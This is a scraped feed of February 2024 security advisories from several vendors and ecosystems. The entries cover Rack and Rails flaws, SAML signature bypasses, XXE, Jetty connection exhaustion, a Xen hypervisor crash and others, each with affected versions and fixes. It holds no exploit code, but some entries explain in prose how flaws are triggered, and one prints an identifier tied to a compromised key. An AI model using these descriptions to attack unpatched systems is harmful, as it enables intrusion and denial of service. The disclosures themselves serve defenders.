https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONPACK-2024-26143
25.02.2024 01:35:01	rubysec	[RUBYSEC:ACTIVESTORAGE-2024-26144] Possible Sensitive Session Information Leak in Active Storage	There is a possible sensitive session information leak in Active Storage.By default, Active Storage sends a `Set-Cookie` header along with the user’ssession cookie when serving blobs. It also sets `Cache-Control` to public.Certain proxies may cache the `Set-Cookie`, leading to an information leak.This vulnerability has been assigned the CVE identifier CVE-2024-26144.Versions Affected: >= 5.2.0, < 7.1.0 Not affected: < 5.2.0, >= 7.1.0 Fixed Versions: 7.0.8.1, 6.1.7.7# ImpactA proxy which chooses to caches this request can cause users to sharesessions. This may include a user receiving an attacker’s session or viceversa.This was patched in 7.1.0 but not previously identified as a securityvulnerability.All users running an affected release should either upgrade or use one of theworkarounds immediately.# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsUpgrade to Rails 7.1.X, or configure caching proxies not to cache the`Set-Cookie` headers.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIVESTORAGE-2024-26144
25.02.2024 01:30:24	rubysec	[RUBYSEC:RACK-2024-25126] Denial of Service Vulnerability in Rack Content-Type Parsing	There is a possible denial of service vulnerability in the content typeparsing component of Rack. This vulnerability has been assigned the CVEidentifier CVE-2024-25126.Versions Affected: >= 0.4 Not affected: < 0.4 Fixed Versions: 3.0.9.1, 2.2.8.1# ImpactCarefully crafted content type headers can cause Rack’s media type parser totake much longer than expected, leading to a possible denial of servicevulnerability.Impacted code will use Rack’s media type parser to parse content type headers.This code will look like below:```request.media_type## ORrequest.media_type_params## ORRack::MediaType.type(content_type)```Some frameworks (including Rails) call this code internally, so upgrading isrecommended!All users running an affected release should either upgrade or use one of theworkarounds immediately.# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-25126
25.02.2024 01:36:44	rubysec	[RUBYSEC:RACK-2024-26141] Possible DoS Vulnerability with Range Header in Rack	There is a possible DoS vulnerability relating to the Range request header inRack. This vulnerability has been assigned the CVE identifier CVE-2024-26141.Versions Affected: >= 1.3.0. Not affected: < 1.3.0 Fixed Versions: 3.0.9.1, 2.2.8.1# ImpactCarefully crafted Range headers can cause a server to respond with anunexpectedly large response. Responding with such large responses could leadto a denial of service issue.Vulnerable applications will use the `Rack::File` middleware or the`Rack::Utils.byte_ranges` methods (this includes Rails applications).# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-26141
25.02.2024 01:43:17	rubysec	[RUBYSEC:RACK-2024-26146] Possible Denial of Service Vulnerability in Rack Header Parsing	There is a possible denial of service vulnerability in the header parsingroutines in Rack. This vulnerability has been assigned the CVE identifierCVE-2024-26146.Versions Affected: All. Not affected: None Fixed Versions: 2.0.9.4, 2.1.4.4, 2.2.8.1, 3.0.9.1# ImpactCarefully crafted headers can cause header parsing in Rack to take longer thanexpected resulting in a possible denial of service issue. `Accept` and`Forwarded` headers are impacted.Ruby 3.2 has mitigations for this problem, so Rack applications usingRuby 3.2 or newer are unaffected.# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-26146
24.02.2024 02:00:00	freebsd	[FREEBSD:2A470712-D351-11EE-86BB-A8A1599412C6] chromium -- multiple security fixes	Chrome Releases reports: This update includes 12 security fixes: [41495060] High CVE-2024-1669: Out of bounds memory access in Blink. Reported by Anonymous on 2024-01-26 [41481374] High CVE-2024-1670: Use after free in Mojo. Reported by Cassidy Kim(@cassidy6564) on 2023-12-06 [41487933] Medium CVE-2024-1671: Inappropriate implementation in Site Isolation. Reported by Harry Chen on 2024-01-03 [41485789] Medium CVE-2024-1672: Inappropriate implementation in Content Security Policy. Reported by Georg Felber (TU Wien) & Marco Squarcina (TU Wien) on 2023-12-19 [41490491] Medium CVE-2024-1673: Use after free in Accessibility. Reported by Weipeng Jiang (@Krace) of VRI on 2024-01-11 [40095183] Medium CVE-2024-1674: Inappropriate implementation in Navigation. Reported by David Erceg on 2019-05-27 [41486208] Medium CVE-2024-1675: Insufficient policy enforcement in Download. Reported by Bartłomiej Wacko on 2023-12-21 [40944847] Low CVE-2024-1676: Inappropriate implementation in Navigation. Reported by Khalil Zhani on 2023-11-21	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:2A470712-D351-11EE-86BB-A8A1599412C6
25.02.2024 02:00:00	debian	[DSA-5631-1] iwd	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5631-1
26.02.2024 22:17:58	slackware	[SSA:2024-057-01] openjpeg (high)	New openjpeg packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/openjpeg-2.5.1-i586-1_slack15.0.txz: Upgraded. Fixed a heap-based buffer overflow in openjpeg in color.c:379:42 in sycc420_to_rgb when decompressing a crafted .j2k file. An attacker could use this to execute arbitrary code with the permissions of the application compiled against openjpeg. For more information, see: https://www.cve.org/CVERecord?id=CVE-2021-3575 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/openjpeg-2.5.1-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/openjpeg-2.5.1-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/openjpeg-2.5.1-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/openjpeg-2.5.1-x86_64-1.txzMD5 signaturesSlackware 15.0 package:b48dde1596a6bbd4ff17853d6305f5d9 openjpeg-2.5.1-i586-1_slack15.0.txzSlackware x86_64 15.0 package:953919aa0e6828dc2edff548e4643a10 openjpeg-2.5.1-x86_64-1_slack15.0.txzSlackware -current package:6ad0d352dbc55d1b5e3d5ffc0b518d41 l/openjpeg-2.5.1-i586-1.txzSlackware x86_64 -current package:f4db01328ea44fa02c8bc8c31661f795 l/openjpeg-2.5.1-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg openjpeg-2.5.1-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-057-01
27.02.2024 04:58:40	maven	[MAVEN:GHSA-RGGV-CV7R-MW98] Connection leaking on idle timeout when TCP congested (high)	### ImpactIf an HTTP/2 connection gets TCP congested, when an idle timeout occurs the HTTP/2 session is marked as closed, and then a GOAWAY frame is queued to be written.However it is not written because the connection is TCP congested.When another idle timeout period elapses, it is then supposed to hard close the connection, but it delegates to the HTTP/2 session which reports that it has already been closed so it does not attempt to hard close the connection.This leaves the connection in ESTABLISHED state (i.e. not closed), TCP congested, and idle.An attacker can cause many connections to end up in this state, and the server may run out of file descriptors, eventually causing the server to stop accepting new connections from valid clients.The client may also be impacted (if the server does not read causing a TCP congestion), but the issue is more severe for servers.### PatchesPatched versions:* 9.4.54* 10.0.20* 11.0.20* 12.0.6### WorkaroundsDisable HTTP/2 and HTTP/3 support until you can upgrade to a patched version of Jetty.HTTP/1.x is not affected.### References* https://github.com/jetty/jetty.project/issues/11256.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RGGV-CV7R-MW98
26.02.2024 22:10:11	npm	[NPM:GHSA-84C3-J8R2-MCM8] @nfid/embed has compromised private key due to @dfinity/auth-client producing insecure session keys (critical)	### ProblemUser sessions in the @nfid/embed SDK with Ed25519 keys are vulnerable due to a compromised private key `535yc-uxytb-gfk7h-tny7p-vjkoe-i4krp-3qmcl-uqfgr-cpgej-yqtjq-rqe`. This exposes users to potential loss of funds on ledgers and unauthorized access to canisters they control.### SolutionUsing version >1.0.1 of @dfinity/auth-client and @dfinity/identity packages, or @nfid/embed >0.10.1-alpha.6 includes patched versions of the issue.User sessions will be automatically fixed when they re-authenticate.### Why this happenedThe DFINITY auth client library provides a function, `Ed25519KeyIdentity.generate`, for generating an Ed25519 key pair. This function includes an optional parameter to supply a 32-byte seed value, which will be utilized as the secret key. In cases where no seed value is provided, the library is expected to generate the secret key using secure randomness. However, a recent update of DFINITY libraries has compromised this assurance by employing an insecure seed for key pair generation.### References[AgentJS CVE ](https://github.com/dfinity/agent-js/security/advisories/GHSA-c9vv-fhgv-cjc3)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-84C3-J8R2-MCM8
26.02.2024 22:04:52	maven	[MAVEN:GHSA-HX5Q-V6PJ-533R] SAML authentication bypass due to missing validation on unsigned SAML messages (critical)	### ImpactWhen SAML is used as the authentication mechanism, Central Dogma accepts unsigned SAML messages (assertions, logout requests, etc.) as they are, rather than rejecting them by default. As a result, an attacker can forge a SAML message to authenticate themselves, despite the fact that such an unsigned SAML message should be rejected.### PatchesThe vulnerability has been patched in Central Dogma 0.64.3 by updating its Armeria dependency to 1.27.2. All users who use SAML as the authentication mechanism must upgrade from 0.64.3 or later.### WorkaroundsA user can manually upgrade the `armeria-saml` module with the one from Armeria 1.27.2 or later, either by replacing the JAR in the Central Dogma distribution or by updating the dependency tree of the build.### References[`SamlMessageUtil.validateSignature()`](https://github.com/line/armeria/blob/0efc776988d71be4da6e506ec8a33c2b7b43f567/saml/src/main/java/com/linecorp/armeria/server/saml/SamlMessageUtil.java#L160-L163)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HX5Q-V6PJ-533R
26.02.2024 22:04:42	maven	[MAVEN:GHSA-4M6J-23P2-8C54] Armeria SAML authentication bypass due to missing validation on unsigned SAML messages (critical)	### ImpactThe SAML implementation provided by `armeria-saml` currently accepts unsigned SAML messages (assertions, logout requests, etc.) as they are, rather than rejecting them by default. As a result, an attacker can forge a SAML message to authenticate themselves, despite the fact that such an unsigned SAML message should be rejected.### PatchesThe vulnerability has been patched in Armeria version 1.27.2. All users who rely on `armeria-saml` older than version 1.27.2 must upgrade to 1.27.2 or later.### WorkaroundsThere is no known workaround for this vulnerability.### References[`SamlMessageUtil.validateSignature()`](https://github.com/line/armeria/blob/0efc776988d71be4da6e506ec8a33c2b7b43f567/saml/src/main/java/com/linecorp/armeria/server/saml/SamlMessageUtil.java#L160-L163)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4M6J-23P2-8C54
26.02.2024 22:01:29	npm	[NPM:GHSA-4GMJ-3P3H-GM8H] es5-ext vulnerable to Regular Expression Denial of Service in `function#copy` and `function#toStringTokens` (low)	### ImpactPassing functions with very long names or complex default argument names into `function#copy` or`function#toStringTokens` may put script to stall### PatchesFixed with https://github.com/medikoo/es5-ext/commit/3551cdd7b2db08b1632841f819d008757d28e8e2 and https://github.com/medikoo/es5-ext/commit/a52e95736690ad1d465ebcd9791d54570e294602Published with v0.10.63### WorkaroundsNo real workaround aside of refraining from using above utilities.### Referenceshttps://github.com/medikoo/es5-ext/issues/201	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4GMJ-3P3H-GM8H
26.02.2024 20:50:31	ubuntu	[USN-6659-1] libde265 vulnerabilities (high)	Several security issues were fixed in libde265.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6659-1
26.02.2024 23:30:38	maven	[MAVEN:GHSA-QPXM-689R-3849] Apache Camel data exposure vulnerability (low)	Exposure of sensitive data by by crafting a malicious EventFactory and providing a custom ExchangeCreatedEvent that exposes sensitive data. Vulnerability in Apache Camel. This issue affects Apache Camel: from 3.21.X through 3.21.3, from 3.22.X through 3.22.0, from 4.0.X through 4.0.3, from 4.X through 4.3.0.Users are recommended to upgrade to version 3.21.4, 3.22.1, 4.0.4 or 4.4.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QPXM-689R-3849
26.02.2024 15:57:11	ubuntu	[USN-6658-1] libxml2 vulnerability (high)	libxml2 could be made to crash or run programs if it opened a speciallycrafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6658-1
26.02.2024 15:52:13	ubuntu	[USN-6657-1] Dnsmasq vulnerabilities (high)	Several security issues were fixed in Dnsmasq.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6657-1
26.02.2024 15:40:22	ubuntu	[USN-6656-1] PostgreSQL vulnerability (high)	PostgreSQL could be made to run arbitrary SQL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6656-1
26.02.2024 12:13:22	ubuntu	[USN-6655-1] GNU binutils vulnerabilities (high)	Several security issues were fixed in GNU binutils.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6655-1
26.02.2024 05:46:59	ubuntu	[USN-6654-1] Roundcube Webmail vulnerability (medium)	Roundcube Webmail could allow cross-site scripting (XSS) attacks.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6654-1
26.02.2024 02:00:00	debian	[DSA-5632-1] composer (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5632-1
26.02.2024 02:00:00	gentoo	[GLSA-202402-30] Glances: Arbitrary Code Execution (normal)	A vulnerability has been found in Glances which may lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-30
26.02.2024 02:00:00	gentoo	[GLSA-202402-31] GNU Aspell: Heap Buffer Overflow (normal)	A vulnerability has been discovered in GNU Aspell which leads to a heap buffer overflow.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-31
26.02.2024 02:00:00	gentoo	[GLSA-202402-32] btrbk: Remote Code Execution (normal)	A vulnerability has been discovered in btrbk which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-32
26.02.2024 02:00:00	gentoo	[GLSA-202402-33] PyYAML: Arbitrary Code Execution (normal)	A vulnerability has been found in PyYAML which can lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202402-33
26.02.2024 02:00:00	oraclelinux	[ELSA-2024-0950] postgresql:15 security update (important)	pgauditpg_repackpostgres-decoderbufspostgresql[15.6-1]- update to 15.6- Fixes CVE-2024-0985	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0950
26.02.2024 02:00:00	oraclelinux	[ELSA-2024-0957] thunderbird security update (important)	[115.8.0-1.0.1]- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js- Enabled aarch64 build[115.8.0-1]- Update to 115.8.0 build1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0957
26.02.2024 02:00:00	oraclelinux	[ELSA-2024-0966] opensc security update (moderate)	[0.23.0-4]- Fix CVE-2023-5992: Side-channel leaks while stripping encryption PKCS#1.5 padding	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0966
26.02.2024 02:00:00	oraclelinux	[ELSA-2024-0976] firefox security update (important)	[115.8.0-1.0.1]- Remove upstream references [Orabug: 30143292]- Update distribution for Oracle Linux [Orabug: 30143292]- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file[115.8.0-1]- Update to 115.8.0 build1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0976
26.02.2024 02:00:00	redhat	[RHSA-2024:0956] postgresql:10 security update (important)	PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0956
26.02.2024 02:00:00	redhat	[RHSA-2024:0965] unbound security update (important)	The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver. Security Fix(es):* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0965
26.02.2024 02:00:00	redhat	[RHSA-2024:0967] opensc security update (moderate)	The OpenSC set of libraries and utilities provides support for working with smart cards. OpenSC focuses on cards that support cryptographic operations and enables their use for authentication, mail encryption, or digital signatures.Security Fix(es):* OpenSC: Side-channel leaks while stripping encryption PKCS#1 padding (CVE-2023-5992)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0967
26.02.2024 02:00:00	redhat	[RHSA-2024:0973] postgresql:15 security update (important)	PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0973
26.02.2024 02:00:00	redhat	[RHSA-2024:0974] postgresql:12 security update (important)	PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0974
26.02.2024 02:00:00	redhat	[RHSA-2024:0975] postgresql:13 security update (important)	PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0975
26.02.2024 02:00:00	redhat	[RHSA-2024:0966] opensc security update (moderate)	The OpenSC set of libraries and utilities provides support for working with smart cards. OpenSC focuses on cards that support cryptographic operations and enables their use for authentication, mail encryption, or digital signatures.Security Fix(es):* OpenSC: Side-channel leaks while stripping encryption PKCS#1 padding (CVE-2023-5992)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0966
26.02.2024 02:00:00	redhat	[RHSA-2024:0977] unbound security update (important)	The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver. Security Fix(es):* bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)* bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0977
26.02.2024 02:00:00	redhat	[RHSA-2024:0957] thunderbird security update (important)	Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.8.0.Security Fix(es):* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0957
26.02.2024 02:00:00	redhat	[RHSA-2024:0976] firefox security update (important)	Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.8.0 ESR.Security Fix(es):* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0976
26.02.2024 02:00:00	redhat	[RHSA-2024:0955] firefox security update (important)	Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.8.0 ESR.Security Fix(es):* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0955
26.02.2024 02:00:00	redhat	[RHSA-2024:0964] thunderbird security update (important)	Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.8.0.Security Fix(es):* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0964
26.02.2024 02:00:00	redhat	[RHSA-2024:0963] thunderbird security update (important)	Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.8.0.Security Fix(es):* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0963
27.02.2024 23:54:16	maven	[MAVEN:GHSA-XH6M-7CR7-XX66] Missing permission checks on Hazelcast client protocol (high)	### ImpactIn Hazelcast through 4.1.10, 4.2 through 4.2.8, 5.0 through 5.0.5, 5.1 through 5.1.7, 5.2 through 5.2.4, and 5.3 through 5.3.2, some client operations don't check permissions properly, allowing authenticated users to access data stored in the cluster.### PatchesFix versions: 5.2.5, 5.3.5, 5.4.0-BETA-1### WorkaroundsThere is no known workaround.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XH6M-7CR7-XX66
27.02.2024 20:31:07	ubuntu	[USN-6644-2] LibTIFF vulnerabilities (high)	Several security issues were fixed in LibTIFF.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6644-2
27.02.2024 23:54:40	maven	[MAVEN:GHSA-JW7R-RXFF-GV24] Apache James MIME4J improper input validation vulnerability (moderate)	Improper input validation allows for header injection in MIME4J library when using MIME4J DOM for composing message.This can be exploited by an attacker to add unintended headers to MIME messages.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JW7R-RXFF-GV24
27.02.2024 23:53:34	maven	[MAVEN:GHSA-QRP9-23P7-G5MF] Apache Ambari XML External Entity injection (moderate)	XML External Entity injection in Apache Ambari versions <= 2.7.7, Users are recommended to upgrade to version 2.7.8, which fixes this issue.More Details:Oozie Workflow Scheduler had a vulnerability that allowed for root-level file reading and privilege escalation from low-privilege users. The vulnerability was caused through lack of proper user input validation.This vulnerability is known as an XML External Entity (XXE) injection attack. Attackers can exploit XXE vulnerabilities to read arbitrary files on the server, including sensitive system files. In theory, it might be possible to use this to escalate privileges.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QRP9-23P7-G5MF
27.02.2024 18:47:13	ubuntu	[USN-6664-1] less vulnerability	less could be made to crash or run arbitrary commands if it receivea crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6664-1
27.02.2024 13:18:33	ubuntu	[USN-6663-1] OpenSSL update	Add implicit rejection in PKCS#1 v1.5 in OpenSSL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6663-1
27.02.2024 12:38:00	xen	[XSA-451] x86: shadow stack vs exceptions from emulation stubs	ISSUE DESCRIPTIONRecent x86 CPUs offer functionality named Control-flow EnforcementTechnology (CET). A sub-feature of this are Shadow Stacks (CET-SS).CET-SS is a hardware feature designed to protect against Return OrientedProgramming attacks. When enabled, traditional stacks holding both dataand return addresses are accompanied by so called "shadow stacks",holding little more than return addresses. Shadow stacks aren'twritable by normal instructions, and upon function returns theircontents are used to check for possible manipulation of a return addresscoming from the traditional stack.In particular certain memory accesses need intercepting by Xen. Invarious cases the necessary emulation involves kind of replaying ofthe instruction. Such replaying typically involves filling and theninvoking of a stub. Such a replayed instruction may raise anexceptions, which is expected and dealt with accordingly.Unfortunately the interaction of both of the above wasn't right:Recovery involves removal of a call frame from the (traditional) stack.The counterpart of this operation for the shadow stack was missing.IMPACTAn unprivileged guest can cause a hypervisor crash, causing a Denial ofService (DoS) of the entire host.VULNERABLE SYSTEMSXen 4.14 and onwards are vulnerable. Xen 4.13 and older are notvulnerable.Only x86 systems with CET-SS enabled are vulnerable. x86 systems withCET-SS unavailable or disabled are not vulnerable. Arm systems are notvulnerable. Seehttps://xenbits.xen.org/docs/latest/faq.html#tell-if-cet-is-activefor how to determine whether CET-SS is active.Only HVM or PVH guests can leverage the vulnerability. PV guests cannotleverage the vulnerability.	https://secdb.nttzen.cloud/security-advisory/xen/XSA-451
27.02.2024 12:17:32	ubuntu	[USN-6305-2] PHP vulnerabilities (critical)	Several security issues were fixed in PHP.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6305-2
28.02.2024 01:00:05	maven	[MAVEN:GHSA-PX7W-C9GW-7GJ3] Apache James server: Privilege escalation via JMX pre-authentication deserialization (moderate)	Apache James prior to version 3.7.5 and 3.8.0 exposes a JMX endpoint on localhost subject to pre-authentication deserialisation of untrusted data.Given a deserialisation gadjet, this could be leveraged as part of an exploit chain that could result in privilege escalation.Note that by default JMX endpoint is only bound locally.We recommend users to: - Upgrade to a non-vulnerable Apache James version - Run Apache James isolated from other processes (docker - dedicated virtual machine) - If possible turn off JMX	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PX7W-C9GW-7GJ3
28.02.2024 00:19:24	rubysec	[RUBYSEC:RACK-CORS-2024-27456] Rack CORS Middleware has Insecure File Permissions	rack-cors (aka Rack CORS Middleware) 2.0.1 has 0666 permissionsfor the .rb files.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-CORS-2024-27456
